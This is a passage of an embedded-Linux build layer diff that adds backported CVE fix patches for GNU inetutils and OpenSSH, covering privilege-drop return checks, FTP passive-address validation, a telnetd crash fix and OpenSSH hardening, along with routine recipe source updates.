+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,8 +278,17 @@ main (int argc, char **argv)
+ {
+ if (asrsh)
+ *argv = (char *) "rlogin";
+- seteuid (getuid ());
+- setuid (getuid ());
++
++ if (seteuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+ }
+@@ -543,8 +552,16 @@ try_connect:
+ error (0, errno, "setsockopt DEBUG (ignored)");
+ }
+
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+ sigaddset (&sigs, SIGINT);
+diff --git a/src/rshd.c b/src/rshd.c
+index b824a10..8cdcd06 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,8 +1848,18 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ pwd->pw_shell = PATH_BSHELL;
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+- setegid ((gid_t) pwd->pw_gid);
+- setgid ((gid_t) pwd->pw_gid);
++ if (setegid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
++ if (setgid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+ #endif
+@@ -1871,7 +1881,11 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ }
+ #endif /* WITH_PAM */
+
+- setuid ((uid_t) pwd->pw_uid);
++ if (setuid ((uid_t) pwd->pw_uid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 55c3d44..6aba294 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,7 +254,12 @@ doit (struct sockaddr *sap, socklen_t salen)
+ sprintf (Username, "USER=%s", user);
+ sprintf (Logname, "LOGNAME=%s", user);
+ dologin (pw, sap, salen);
+- setgid (pw->pw_gid);
++
++ if (setgid (pw->pw_gid) == -1)
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -263,7 +268,13 @@ doit (struct sockaddr *sap, socklen_t salen)
+ fprintf (stderr, "Login incorrect.");
+ return;
+ }
+- setuid (pw->pw_uid);
++
++ if (setuid (pw->pw_uid) == -1)
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
++
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
new file mode 100644
index 0000000000..4bc354d256
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
@@ -0,0 +1,254 @@
+From 70fe022f9dac760eaece0228cad17e3d29a57fb8 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Mon, 31 Jul 2023 13:59:05 +0200
+Subject: [PATCH] CVE-2023-40303: Indent changes in previous commit.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=9122999252c7e21eb7774de11d539748e7bdf46d]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/rcp.c | 42 ++++++++++++++++++++++++------------------
+ src/rlogin.c | 12 ++++++------
+ src/rsh.c | 24 ++++++++++++------------
+ src/rshd.c | 24 ++++++++++++------------
+ src/uucpd.c | 16 ++++++++--------
+ 5 files changed, 62 insertions(+), 56 deletions(-)
+
+diff --git a/src/rcp.c b/src/rcp.c
+index cdcf8500..652f22e6 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,9 +347,10 @@ main (int argc, char *argv[])
+ response ();
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ source (argc, argv);
+ exit (errs);
+@@ -358,9 +359,10 @@ main (int argc, char *argv[])
+ if (to_option)
+ { /* Receive data. */
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ sink (argc, argv);
+ exit (errs);
+@@ -548,9 +550,10 @@ toremote (char *targ, int argc, char *argv[])
+ free (bp);
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -645,9 +648,10 @@ tolocal (int argc, char *argv[])
+ }
+
+ if (seteuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+@@ -663,9 +667,10 @@ tolocal (int argc, char *argv[])
+ sink (1, vect);
+
+ if (seteuid (effuid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ close (rem);
+ rem = -1;
+@@ -1465,9 +1470,10 @@ susystem (char *s, int userid)
+
+ case 0:
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+diff --git a/src/rlogin.c b/src/rlogin.c
+index c543de0c..4360202f 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -648,14 +648,14 @@ try_connect:
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index 6f60667d..179b47cd 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,14 +278,14 @@ main (int argc, char **argv)
+ *argv = (char *) "rlogin";
+
+ if (seteuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+@@ -551,14 +551,14 @@ try_connect:
+ }
+
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+diff --git a/src/rshd.c b/src/rshd.c
+index 707790e7..3a153a18 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,16 +1848,16 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+ if (setegid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setegid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ if (setgid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setgid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+@@ -1881,10 +1881,10 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ #endif /* WITH_PAM */
+
+ if (setuid ((uid_t) pwd->pw_uid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setuid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 29cfce35..fde7b9c9 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,10 +254,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ dologin (pw, sap, salen);
+
+ if (setgid (pw->pw_gid) == -1)
+- {
+- fprintf (stderr, "setgid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -268,10 +268,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ }
+
+ if (setuid (pw->pw_uid) == -1)
+- {
+- fprintf (stderr, "setuid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
+
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
new file mode 100644
index 0000000000..54252d6bc7
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
@@ -0,0 +1,67 @@
+From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Fri, 17 Dec 2021 21:52:18 -0800
+Subject: [PATCH] ftp: check that PASV/LSPV addresses match.
+
+* NEWS: Mention change.
+* ftp/ftp.c (initconn): Validate returned addresses.
+
+CVE: CVE-2021-40491
+
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd]
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ ftp/ftp.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ftp/ftp.c b/ftp/ftp.c
+index 9813586..7c72cb2 100644
+--- a/ftp/ftp.c
++++ b/ftp/ftp.c
+@@ -1344,6 +1344,13 @@ initconn (void)
+ uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr;
+ pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]);
+ }
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv4 */
+ else /* IPv6 */
+ {
+@@ -1374,6 +1381,13 @@ initconn (void)
+ pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]);
+ pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]);
+ }
++ if (data_addr_sa6->sin6_addr.s6_addr
++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv6 */
+ }
+ else /* !EPSV && !LPSV */
+@@ -1394,6 +1408,13 @@ initconn (void)
+ | ((a2 & 0xff) << 8) | (a3 & 0xff) );
+ data_addr_sa4->sin_port =
+ htons (((p0 & 0xff) << 8) | (p1 & 0xff));
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* PASV */
+ else
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
new file mode 100644
index 0000000000..da2da8da8a
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
@@ -0,0 +1,54 @@
+From eaae65aac967f9628787dca4a2501ca860bb6598 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Mon, 26 Sep 2022 22:05:07 +0200
+Subject: [PATCH] telnetd: Handle early IAC EC or IAC EL receipt
+
+Fix telnetd crash if the first two bytes of a new connection
+are 0xff 0xf7 (IAC EC) or 0xff 0xf8 (IAC EL).
+
+The problem was reported in:
+<https://pierrekim.github.io/blog/2022-08-24-2-byte-dos-freebsd-netbsd-telnetd-netkit-telnetd-inetutils-telnetd-kerberos-telnetd.html>.
+
+* NEWS: Mention fix.
+* telnetd/state.c (telrcv): Handle zero slctab[SLC_EC].sptr and
+zero slctab[SLC_EL].sptr.
+
+CVE: CVE-2022-39028
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=fae8263e467380483c28513c0e5fac143e46f94f]
+Signed-off-by: Minjae Kim<flowergom@gmail.com>
+---
+ telnetd/state.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/telnetd/state.c b/telnetd/state.c
+index 2184bca..7948503 100644
+--- a/telnetd/state.c
++++ b/telnetd/state.c
+@@ -314,15 +314,21 @@ telrcv (void)
+ case EC:
+ case EL:
+ {
+- cc_t ch;
++ cc_t ch = (cc_t) (_POSIX_VDISABLE);
+
+ DEBUG (debug_options, 1, printoption ("td: recv IAC", c));
+ ptyflush (); /* half-hearted */
+ init_termbuf ();
+ if (c == EC)
+- ch = *slctab[SLC_EC].sptr;
++ {
++ if (slctab[SLC_EC].sptr)
++ ch = *slctab[SLC_EC].sptr;
++ }
+ else
+- ch = *slctab[SLC_EL].sptr;
++ {
++ if (slctab[SLC_EL].sptr)
++ ch = *slctab[SLC_EL].sptr;
++ }
+ if (ch != (cc_t) (_POSIX_VDISABLE))
+ pty_output_byte ((unsigned char) ch);
+ break;
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
index cc9410b94e..3a68b34825 100644
--- a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
+++ b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
@@ -23,6 +23,10 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \
file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \
file://0001-rcp-fix-to-work-with-large-files.patch \
file://fix-buffer-fortify-tfpt.patch \
+ file://CVE-2021-40491.patch \
+ file://CVE-2022-39028.patch \
+ file://0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch \
+ file://0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch \
"
SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52"
diff --git a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
index 5e4460045b..5213b28345 100644
--- a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
+++ b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Name Service Switch module for Multicast DNS (zeroconf) name resolution"
HOMEPAGE = "https://github.com/lathiat/nss-mdns"
+DESCRIPTION = "nss-mdns is a plugin for the GNU Name Service Switch (NSS) functionality of the GNU C Library (glibc) providing host name resolution via Multicast DNS (aka Zeroconf, aka Apple Rendezvous, aka Apple Bonjour), effectively allowing name resolution by common Unix/Linux programs in the ad-hoc mDNS domain .local."
SECTION = "libs"
LICENSE = "LGPLv2.1+"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1"
DEPENDS = "avahi"
-SRC_URI = "git://github.com/lathiat/nss-mdns \
+SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \
"
SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae"
diff --git a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
index 0b0bbab168..a4030b7b32 100644
--- a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
+++ b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
@@ -1,13 +1,15 @@
SUMMARY = "Mobile Broadband Service Provider Database"
HOMEPAGE = "http://live.gnome.org/NetworkManager/MobileBroadband/ServiceProviders"
+DESCRIPTION = "Mobile Broadband Service Provider Database stores service provider specific information. When this Database is available the information can be fetched there"
SECTION = "network"
LICENSE = "PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=87964579b2a8ece4bc6744d2dc9a8b04"
-SRCREV = "22b49d86fb7aded2c195a9d49e5924da696b3228"
-PV = "20190618"
+
+SRCREV = "aae7c68671d225e6d35224613d5b98192b9b2ffe"
+PV = "20230416"
PE = "1"
-SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https"
+SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=main"
S = "${WORKDIR}/git"
inherit autotools
diff --git a/meta/recipes-connectivity/neard/neard_0.16.bb b/meta/recipes-connectivity/neard/neard_0.16.bb
index 7c124a3c0b..dd0742f792 100644
--- a/meta/recipes-connectivity/neard/neard_0.16.bb
+++ b/meta/recipes-connectivity/neard/neard_0.16.bb
@@ -2,21 +2,22 @@ SUMMARY = "Linux NFC daemon"
DESCRIPTION = "A daemon for the Linux Near Field Communication stack"
HOMEPAGE = "http://01.org/linux-nfc"
LICENSE = "GPLv2"
+LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
+ file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
+ "
DEPENDS = "dbus glib-2.0 libnl"
-SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BP}.tar.xz \
+SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=git;branch=master \
file://neard.in \
file://Makefile.am-fix-parallel-issue.patch \
file://Makefile.am-do-not-ship-version.h.patch \
file://0001-Add-header-dependency-to-nciattach.o.patch \
"
-SRC_URI[md5sum] = "5c691fb7872856dc0d909c298bc8cb41"
-SRC_URI[sha256sum] = "eae3b11c541a988ec11ca94b7deab01080cd5b58cfef3ced6ceac9b6e6e65b36"
-LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
- file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
- "
+SRCREV = "949795024f7625420e93e288c56e194cb9a3e74a"
+
+S = "${WORKDIR}/git"
inherit autotools pkgconfig systemd update-rc.d
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
new file mode 100644
index 0000000000..3adb981fb4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
@@ -0,0 +1,97 @@
+From b3855ff053f5078ec3d3c653cdaedefaa5fc362d Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 05:23:03 +0000
+Subject: upstream: tweak the client hostkey preference ordering algorithm to
+
+prefer the default ordering if the user has a key that matches the
+best-preference default algorithm.
+
+feedback and ok markus@
+
+OpenBSD-Commit-ID: a92dd7d7520ddd95c0a16786a7519e6d0167d35f
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ sshconnect2.c | 41 ++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 38 insertions(+), 3 deletions(-)
+
+CVE: CVE-2020-14145
+Upstream-Status: Backport [https://anongit.mindrot.org/openssh.git/patch/?id=b3855ff053f5078ec3d3c653cdaedefaa5fc362d]
+Comment: Refreshed first hunk
+
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 347e348c..f64aae66 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: sshconnect2.c,v 1.320 2020/02/06 22:48:23 djm Exp $ */
++/* $OpenBSD: sshconnect2.c,v 1.326 2020/09/18 05:23:03 djm Exp $ */
+ /*
+ * Copyright (c) 2000 Markus Friedl. All rights reserved.
+ * Copyright (c) 2008 Damien Miller. All rights reserved.
+@@ -102,12 +102,25 @@ verify_host_key_callback(struct sshkey *hostkey, struct ssh *ssh)
+ return 0;
+ }
+
++/* Returns the first item from a comma-separated algorithm list */
++static char *
++first_alg(const char *algs)
++{
++ char *ret, *cp;
++
++ ret = xstrdup(algs);
++ if ((cp = strchr(ret, ',')) != NULL)
++ *cp = '\0';
++ return ret;
++}
++
+ static char *
+ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ {
+- char *oavail, *avail, *first, *last, *alg, *hostname, *ret;
++ char *oavail = NULL, *avail = NULL, *first = NULL, *last = NULL;
++ char *alg = NULL, *hostname = NULL, *ret = NULL, *best = NULL;
+ size_t maxlen;
+- struct hostkeys *hostkeys;
++ struct hostkeys *hostkeys = NULL;
+ int ktype;
+ u_int i;
+
+@@ -119,6 +132,26 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ for (i = 0; i < options.num_system_hostfiles; i++)
+ load_hostkeys(hostkeys, hostname, options.system_hostfiles[i]);
+
++ /*
++ * If a plain public key exists that matches the type of the best
++ * preference HostkeyAlgorithms, then use the whole list as is.
++ * Note that we ignore whether the best preference algorithm is a
++ * certificate type, as sshconnect.c will downgrade certs to
++ * plain keys if necessary.
++ */
++ best = first_alg(options.hostkeyalgorithms);
++ if (lookup_key_in_hostkeys_by_type(hostkeys,
++ sshkey_type_plain(sshkey_type_from_name(best)), NULL)) {
++ debug3("%s: have matching best-preference key type %s, "
++ "using HostkeyAlgorithms verbatim", __func__, best);
++ ret = xstrdup(options.hostkeyalgorithms);
++ goto out;
++ }
++
++ /*
++ * Otherwise, prefer the host key algorithms that match known keys
++ * while keeping the ordering of HostkeyAlgorithms as much as possible.
++ */
+ oavail = avail = xstrdup(options.hostkeyalgorithms);
+ maxlen = strlen(avail) + 1;
+ first = xmalloc(maxlen);
+@@ -159,6 +192,8 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ if (*first != '\0')
+ debug3("%s: prefer hostkeyalgs: %s", __func__, first);
+
++ out:
++ free(best);
+ free(first);
+ free(last);
+ free(hostname);
+--
+cgit v1.2.3
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
new file mode 100644
index 0000000000..9fd7e932d1
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
@@ -0,0 +1,20 @@
+Description: fix double-free memory corruption in ssh-agent
+Author: Marc Deslauriers <marc.deslauriers@canonical.com>
+Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+CVE: CVE-2021-28041
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz]
+Comment: No change in any hunk
+
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e)
+ goto err;
+ }
+ free(ext_name);
++ ext_name = NULL;
+ break;
+ default:
+ error("%s: Unknown constraint %d", __func__, ctype);
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
new file mode 100644
index 0000000000..bda896f581
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
@@ -0,0 +1,52 @@
+From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001
+From: Ali Abdallah <aabdallah@suse.de>
+Date: Wed, 24 Nov 2021 13:33:39 +0100
+Subject: [PATCH] CVE-2021-41617 fix
+
+backport of the following two upstream commits
+
+f3cbe43e28fe71427d41cfe3a17125b972710455
+bf944e3794eff5413f2df1ef37cddf96918c6bde
+
+CVE-2021-41617: sshd(8) failed to correctly initialise supplemental groups
+when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand,
+where an AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser
+directive has been set to run the command as a different user. Instead
+these commands would inherit the groups that sshd(8) was started with.
+---
+ auth.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+CVE: CVE-2021-41617
+Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/auth.c b/auth.c
+index 163038f..a47b267 100644
+--- a/auth.c
++++ b/auth.c
+@@ -52,6 +52,7 @@
+ #include <limits.h>
+ #include <netdb.h>
+ #include <time.h>
++#include <grp.h>
+
+ #include "xmalloc.h"
+ #include "match.h"
+@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command,
+ }
+ closefrom(STDERR_FILENO + 1);
+
++ if (geteuid() == 0 &&
++ initgroups(pw->pw_name, pw->pw_gid) == -1) {
++ error("%s: initgroups(%s, %u): %s", tag,
++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno));
++ _exit(1);
++ }
++
+ /* Don't use permanently_set_uid() here to avoid fatal() */
+ if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) {
+ error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
+--
+2.26.2
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
new file mode 100644
index 0000000000..c899056337
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
@@ -0,0 +1,189 @@
+From f6213e03887237714eb5bcfc9089c707069f87c5 Mon Sep 17 00:00:00 2001
+From: Damien Miller <djm@mindrot.org>
+Date: Fri, 1 Oct 2021 16:35:49 +1000
+Subject: [PATCH 01/12] make OPENSSL_HAS_ECC checks more thorough
+
+ok dtucker
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/dee22129bbc61e25b1003adfa2bc584c5406ef2d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 16 ++++++++--------
+ ssh-pkcs11.c | 26 +++++++++++++-------------
+ 2 files changed, 21 insertions(+), 21 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 8a0ffef..41114c7 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -163,7 +163,7 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ return (ret);
+ }
+
